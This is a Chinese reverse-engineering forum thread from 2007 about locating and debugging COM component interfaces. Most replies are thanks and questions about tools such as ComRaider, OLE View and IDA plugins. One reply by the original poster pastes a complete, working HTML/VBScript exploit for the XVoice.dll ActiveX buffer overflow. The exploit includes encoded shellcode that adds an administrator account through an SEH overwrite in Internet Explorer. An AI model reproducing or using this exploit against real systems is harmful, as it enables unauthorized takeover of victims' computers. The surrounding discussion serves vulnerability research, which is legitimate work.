[原创]跟踪调试COM组件的接口-软件逆向-看雪-安全社区|安全招聘|kanxue.com

[原创]跟踪调试COM组件的接口

发表于: 2007-6-18 10:03 31647

[原创]跟踪调试COM组件的接口

kisser1

活跃值

2

2007-6-18 10:03

31647

跟踪调试COM组件的接口，具体内容请看附件
email:kisser1@126.com
QQ:87784858

登录后可查看完整内容

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入！

上传的附件：

跟踪调试COM组件的接口.rar （323.66kb，1706次下载）

收藏・36

免费・7

支持

分享

最新回复 (18)
cyclotron 雪币： 392 活跃值： (909) 能力值： ( LV9，RANK：690 ) 在线值：发帖 43 回帖 800 粉丝 9 关注私信	cyclotron 17 2 楼好文章，学习～不知道楼主对于activex组件的分发过程有没有研究？ 2007-6-18 13:38 0
kisser1 雪币： 223 活跃值： (10) 能力值： ( LV6，RANK：90 ) 在线值：发帖 7 回帖 29 粉丝 0 关注私信	kisser1 2 3 楼具体的倒没有哦,当时,我的目标只有一个,就是能够定位COM组件的接口。至于分发过程，网上也有关于这方面的文章，记得当时也是参考了这些文章 2007-6-19 09:01 0
yijun8354 雪币： 1919 活跃值： (901) 能力值： ( LV9，RANK：490 ) 在线值：发帖 22 回帖 784 粉丝 1 关注私信	yijun8354 12 4 楼继续学习:) 2007-6-19 09:36 0
peaceclub 雪币： 255 活跃值： (207) 能力值： ( LV9，RANK：250 ) 在线值：发帖 59 回帖 967 粉丝 1 关注私信	peaceclub 6 5 楼 comraider貌似不怎么好用. 2007-6-19 09:55 0
peaceclub 雪币： 255 活跃值： (207) 能力值： ( LV9，RANK：250 ) 在线值：发帖 59 回帖 967 粉丝 1 关注私信	peaceclub 6 6 楼在问问,vb下直接tlbinf32.dll就可以. delphi下如何获得COM组件的接口信息表? 2007-6-19 09:56 0
kisser1 雪币： 223 活跃值： (10) 能力值： ( LV6，RANK：90 ) 在线值：发帖 7 回帖 29 粉丝 0 关注私信	kisser1 2 7 楼 Delphi下，具体情况我不晓得。你知道COM是通用的嘛，所以，要查看COM的接口，可以使用ComRaider，或者使用VC里的一个工具,叫做"Ole View"，启动后，选择菜单“File”->“View TypeLib”，即可看到COM接口的信息。这篇文章，是基于自动化COM 的。 ComRaider是我拿来挖掘漏洞用的。看下面的代码，那个貌似是用ComRaider找到的，可惜到现在我还没找到过一个漏洞~ -_-!! 下面这个漏洞需要用到Unicode来写Shellcode。比较麻烦点。 <!-- 01/06/2007 23.19.50 Microsoft Windows DirectSpeechSynthesis Module (XVoice.dll) / DirectSpeechRecognition Module (Xlisten.dll) remote buffer overflow exploit / 2k sp4 seh version both the dlls are located in %SystemRoot%\speech folder and they are vulnerable to the same issue. while on 2k it depends on activex settings, under xp they are both set to "safe for a trusted caller", i.e. Internet Explorer registers after that some chars are passed to ModeName argument of FindEgine method and seh handler is overwritten: EAX 00000000 ECX 00000000 EDX 02770608 EBX 6535F590 XVoice.6535F590 ESP 0012DBB8 UNICODE "AAAA... EBP 00410041 IEXPLORE.00410041 ESI 001921BC EDI 0012DBF8 UNICODE "AAAA... EIP 00410041 IEXPLORE.00410041 I succesfully run this code on win2k, patching the shellcode with the venetian technique, adding an Administrator account, against IE6. Under xp, with predefined settings, Internet Explorer immediately crashes without warning the user first, and it's still possible running arbitrary code, it depends on jumpable Unicode addresses loaded in memory by A. Micalizzi (aka rgod) site: retrogod.altervista.org ***note: this was indipendently discovered by me and Will Dormann during the same period, documented here: http://www.kb.cert.org/vuls/id/507433 http://www.microsoft.com/technet/security/Bulletin/MS07-033.mspx the affected package, http://www.microsoft.com/speech/AppHelp(SAPI4)/sapi4.asp is still distributed with the kill bit not set --> <html> <object classid='clsid:EEE78591-FE22-11D0-8BEF-0060081841DE' id='DirectSS'></OBJECT> <script language='vbscript'> targetFile = "C:\WINNT\speech\XVoice.dll" memberName = "FindEngine" progid = "ACTIVEVOICEPROJECTLib.DirectSS" argCount = 28 REM metasploit one, JmpCallAddtive, add a user 'su' with pass 'p' scode_fragment = unescape("%6E%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%06%90%90%90%90%90%90%90%fc%e4%22%eb%5e%31%ad%c3%c0%f7%e8%ff%ff%af%1a%30%5f%bb%5a%bd%ee%a5%ae%d4%19%e3%9b%3a%05%b9%42%03%a7%41%4c%11%a9%7c%ee%7f%77%8c%f3%90%e8%b4%ef%4c%d4%8c%d4%99%e4%5d%08%1e%9a%82%17%b3%21%43%31%44%5a%1b%6d%f5%69%39%d9%c4%38%50%43%af%44%cc%df%76%7a%57%a5%c2%85%7e%b7%f3%18%d3%39%70%9f%16%94%aa%37%5f%c5%ea%0a%70%23%10%c0%83%47%37%eb%97%6a%b3%6c%3c%6c") nop1 = unescape("%01%6E%40%6E%40%6E%40%6E%40%6E%40%6E%40%6E%40") c1 = unescape("%6E") : REM add byte ptr esi, ch (as nop) c2 = unescape("%40%6E%40%6E%40%6E%40%6E%40%6E%40%6E%40%6E%40%6E%97%6E%40") : REM xchg eax, edi c3 = unescape("%6E%40%6E%05%18%09") : REM add eax c4 = unescape("%6E%40%6E%2d%11%09") : REM sub eax c5 = unescape("%6E%80%90%6E%40%6E%40") : REM add byte ptr eax 90, inc eax twice code = nop1 & c1 & c2 & c3 & c4 & c5 & _ unescape("%6E%80%90%6E%40%6E%40%6E%80%90%6E%40%6E%40%6E%80%90%6E%40%6E%40%6E%80%90%6E%40%6E%40%6E%80%90%6E%40%6E%40%6E%80%90%6E%40%6E%40%6E%80%90%6E%40%6E%40%6e%80%bb%6e%40%6e%40%6e%80%47%6e%40%6e%40%6e%80%1a%6e%40%6e%40%6e%80%0c%6e%40%6e%40%6e%80%56%6e%40%6e%40%6e%80%1e%6e%40%6e%40%6e%80%01%6e%40%6e%40%6e%80%85%6e%40%6e%40%6e%80%75%6e%40%6e%40%6e%80%c3%6e%40%6e%40%6e%80%ef%6e%40%6e%40%6e%80%ff%6e%40%6e%40%6e%80%18%6e%40%6e%40%6e%80%66%6e%40%6e%40%6e%80%e0%6e%40%6e%40%6e%80%ec%6e%40%6e%40%6e%80%dc%6e%40%6e%40%6e%80%8e%6e%40%6e%40%6e%80%64%6e%40%6e%40%6e%80%81%6e%40%6e%40%6e%80%db%6e%40%6e%40%6e%80%d6%6e%40%6e%40%6e%80%c3%6e%40%6e%40%6e%80%03%6e%40%6e%40%6e%80%88%6e%40%6e%40%6e%80%58%6e%40%6e%40%6e%80%60%6e%40%6e%40%6e%80%9f%6e%40%6e%40%6e%80%d0%6e%40%6e%40%6e%80%df%6e%40%6e%40%6e%80%2f%6e%40%6e%40%6e%80%15%6e%40%6e%40%6e%80%2e%6e%40%6e%40%6e%80%41%6e%40%6e%40%6e%80%0b%6e%40%6e%40%6e%80%b2%6e%40%6e%40%6e%80%1e%6e%40%6e%40%6e%80%31%6e%40%6e%40%6e%80%c4%6e%40%6e%40%6e%80%ad%6e%40%6e%40%6e%80%8f%6e%40%6e%40%6e%80%7a%6e%40%6e%40%6e%80%d0%6e%40%6e%40%6e%80%7d%6e%40%6e%40%6e%80%65%6e%40%6e%40%6e%80%f6%6e%40%6e%40%6e%80%92%6e%40%6e%40%6e%80%54%6e%40%6e%40%6e%80%60%6e%40%6e%40%6e%80%54%6e%40%6e%40%6e%80%0c%6e%40%6e%40%6e%80%d7%6e%40%6e%40%6e%80%49%6e%40%6e%40%6e%80%af%6e%40%6e%40%6e%80%da%6e%40%6e%40%6e%80%5c%6e%40%6e%40%6e%80%ac%6e%40%6e%40%6e%80%f1%6e%40%6e%40%6e%80%24%6e%40%6e%40%6e%80%e2%6e%40%6e%40%6e%80%3f%6e%40%6e%40%6e%80%44%6e%40%6e%40%6e%80%3f%6e%40%6e%40%6e%80%2e%6e%40%6e%40%6e%80%03%6e%40%6e%40%6e%80%01%6e%40%6e%40%6e%80%1b%6e%40%6e%40%6e%80%e8%6e%40%6e%40%6e%80%58%6e%40%6e%40%6e%80%91%6e%40%6e%40%6e%80%36%6e%40%6e%40%6e%80%be%6e%40%6e%40%6e%80%b5%6e%40%6e%40%6e%80%a7%6e%40%6e%40%6e%80%b3%6e%40%6e%40%6e%80%80%6e%40%6e%40%6e%80%24%6e%40%6e%40%6e%80%43%6e%40%6e%40%6e%80%84%6e%40%6e%40%6e%80%e4%6e%40%6e%40%6e%80%f8%6e%40%6e%40%6e%80%77%6e%40%6e%40%6e%80%96%6e%40%6e%40%6e%80%03%6e%40%6e%40%6e%80%13%6e%40%6e%40%6e%80%89%6e%40%6e%40%6e%80%fb%6e%40%6e%40%6e%80%24%6e%40%6e%40%6e%80%8b%6e%40%6e%40%6e%80%e9%6e%40%6e%40%6e%80%0f%6e%40%6e%40%6e%80%d6%6e%40%6e%40%6e%80%ef%6e%40%6e%40%6e%80%73%6e%40%6e%40%6e%80%cf%6e%40%6e%40%6e%80%14%6e%40%6e%40%6e%80%6e%6e%40%6e%40%6e%80%8c%6e%40%6e%40%6e%80%1f%6e%40%6e%40%6e%80%22%6e%40%6e%40%6e%80%9e%6e%40%6e%40%6e%80%ae%6e%40%6e%40%6e%80%4e%6e%40%6e%40%6e%80%43%6e%40%6e%40%6e%80%fc%6e%40%6e%40%6e%80%d7%6e%40%6e%40%6e%80%72%6e%40%6e%40%6e%80%38%6e%40%6e%40%6e%80%07%6e%40%6e%40%6e%80%17%6e%40%6e%40%6e%80%83%6e%40%6e%40%6e%80%67%6e%40%6e%40%6e%80%4b%6e%40%6e%40%6e%80%68%6e%40%6e%40") seh_handler=unescape("%23%7d") : REM 0x007d0023 call edi, found with msfpescan eax = unescape("%01%12") : REM fix eax register, we fall in a more convenient condition suntzu = String(950, "A") + eax + seh_handler + code + scode_fragment EngineID="default" MfgName="default" ProductName="default" ModeID="default" ModeName= suntzu LanguageID=1 Dialect="default" Speaker="default" Style="default" Gender=1 Age=1 Features=1 Interfaces=1 EngineFeatures=1 RankEngineID=1 RankMfgName=1 RankProductName=1 RankModeID=1 RankModeName=1 RankLanguage=1 RankDialect=1 RankSpeaker=1 RankStyle=1 RankGender=1 RankAge=1 RankFeatures=1 RankInterfaces=1 RankEngineFeatures=1 DirectSS.FindEngine EngineID, MfgName, ProductName, ModeID, ModeName, LanguageID, Dialect, Speaker, Style, Gender, Age, Features, Interfaces, EngineFeatures, RankEngineID, RankMfgName, RankProductName, RankModeID, RankModeName, RankLanguage, RankDialect, RankSpeaker, RankStyle, RankGender, RankAge, RankFeatures, RankInterfaces, RankEngineFeatures </script> </html> 2007-6-19 11:22 0
blowfish 雪币： 3246 活跃值： (374) 能力值： (RANK：20 ) 在线值：发帖 15 回帖 296 粉丝 7 关注私信	blowfish 8 楼 IDA pro有个插件Com Plugin可以加载COM组件后根据typelib来定位每个接口函数的地址。不过是for老版本的IDA的，不能在v5.1上编译。有兴趣的可以改一下。 http://www.openrce.org/downloads/details/10/Com_Plugin_v1.2 2007-6-19 14:58 0
tantang 雪币： 35 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 17 粉丝 0 关注私信	tantang 9 楼最近弄这个。。。这个文档太有帮助了。。。谢谢 2010-11-28 10:27 0
QGW 雪币： 33 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 6 粉丝 0 关注私信	QGW 10 楼学习了，非常感谢 2010-11-29 06:52 0
xiaobodian 雪币： 27 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	xiaobodian 11 楼楼主的资料我认真看过，但还是想跟楼主交流一下我的想法，既然你这里是跟踪调试COM组件，那么请问楼主有没有办法跟踪调试特定应用软件的COM组件呢？又具体化来说，对于具有COM格式并基于OLE的ActiveX，不知楼主有没有好的办法可以定位、跟踪？期待楼主的答复。 2011-2-15 13:00 0
katar 雪币： 200 活跃值： (22) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 6 粉丝 0 关注私信	katar 12 楼先谢过！ 2011-9-16 20:47 0
baron 雪币： 194 活跃值： (25) 能力值： ( LV3，RANK：30 ) 在线值：发帖 1 回帖 58 粉丝 1 关注私信	baron 13 楼正好无意中看到这个了 2012-2-8 21:29 0
horseear 雪币： 200 活跃值： (20) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 3 粉丝 0 关注私信	horseear 14 楼好文章啊，但是如何对付Anti-Debug呢？卡住了 2012-3-18 20:32 0
半斤八兩雪币： 223 活跃值： (516) 能力值： ( LV13，RANK：520 ) 在线值：发帖 68 回帖 610 粉丝 22 关注私信	半斤八兩 10 15 楼 LZ,附件中的程序,用你的方法对dispcallfunc下断,结果函数还是无法断下~ 上传的附件： com.7z （16.05kb，28次下载） 2014-1-7 19:09 0
cuixzuo 雪币： 411 活跃值： (46) 能力值： ( LV2，RANK：10 ) 在线值：发帖 12 回帖 60 粉丝 0 关注私信	cuixzuo 16 楼对于oleaut32.dll内部,有没有公式可以表达它把dispid计算为地址的方法? 2014-2-16 19:55 0
ling林雪币： 110 活跃值： (308) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 105 粉丝 0 关注私信	ling林 17 楼 mark.... 2014-2-16 20:52 0
xdlakx 雪币： 630 活跃值： (570) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 98 粉丝 0 关注私信	xdlakx 18 楼很好的文章，谢谢分享 2015-7-5 16:00 0
fanghongjian 雪币： 2 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 2 粉丝 0 关注私信	fanghongjian 19 楼正好需要，感谢分享 2018-8-10 17:35 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

返回

kisser1

发帖

回帖

RANK

他的文章

看雪公众号

专注于PC、移动、智能设备安全研究及逆向工程的开发者社区

//